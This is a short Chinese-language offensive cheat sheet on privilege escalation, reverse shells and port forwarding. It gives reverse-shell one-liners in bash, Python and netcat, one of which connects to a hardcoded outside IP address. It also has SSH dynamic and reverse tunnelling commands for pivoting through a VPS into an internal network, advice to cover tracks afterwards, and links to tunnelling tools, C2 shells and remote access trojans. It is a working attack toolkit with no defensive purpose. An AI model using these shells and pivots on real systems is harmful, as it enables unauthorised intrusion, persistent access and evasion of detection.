提权AND反弹OR转发

bash -i >& /dev/tcp/ip/3333 0>&1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('149.28.133.203',333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
nc -e /bin/sh ip 3333
python -c 'import pty; pty.spawn("/bin/bash")' 

https://www.freebuf.com/news/142195.html

reGeorgSocksProxy.py -p 9999 -u   木马

ssh -f -N -D ip:7070 xss@172.30.0.2

ssh -CfNg -D 7001  root@172.30.0.2 -p 22
A是vps主机，B,C 是内网
B: ssh -p 22 -qngfNTR "*:7777:localhost:22" root@A的vps
A主机的sshd配置文件/etc/ssh/sshd_config添加：GatewayPorts yes

在C主机上面运行:
C: ssh -p 7777 -qngfNTD 8888 root@A的vps
然后输入B主机的ssh密码,此时就可以以C主机的8888端口作为socks5代理来进入B的内网

不想输入密码可以用私钥，注意擦屁股。

http://www.ttlsa.com/linux/linux-setup-socks-5-ttlsa/

https://github.com/vzex/dog-tunnel 狗洞
https://github.com/SECFORCE/Tunna Tunna是一组将包裹和隧道通过HTTP任何TCP通信工具。它可用于绕过在充分防火墙环境中的网络的限制。
https://github.com/ahhh/Reverse_DNS_Shell 使用DNS作为C2通道蟒蛇反向壳
https://github.com/subTee/PoshRat PowerShell的反向HTTPs的壳
https://github.com/inquisb/icmpsh 简单的反向ICMP外壳
https://github.com/ring04h/rtcp2udp 反向TCP端口UDP转发工具
https://github.com/gentry0520/udptunnel 稳定的UDP反向端口映射方法
https://github.com/RicterZ/reprocks  一个Python socks5代理服务器/客户端
https://github.com/T3rry7f/tulua HTTP隧道的TCP连接
https://github.com/sweetsoftware/Ares Python的僵尸网络以及后门 战神是一个Python远程访问工具。
https://github.com/sailro/Bdtunnel BoutDuTunnel能够创建在HTTP请求隧道虚拟连接。
https://github.com/n1nj4sec/pupy Pupy是一个开源，跨平台（Windows，Linux和OSX，Android版），多功能RAT（远程管理工具
https://github.com/funkandwagnalls/ranger一个工具，支持安全专家的访问和远程基于Microsoft Windows的系统进行交互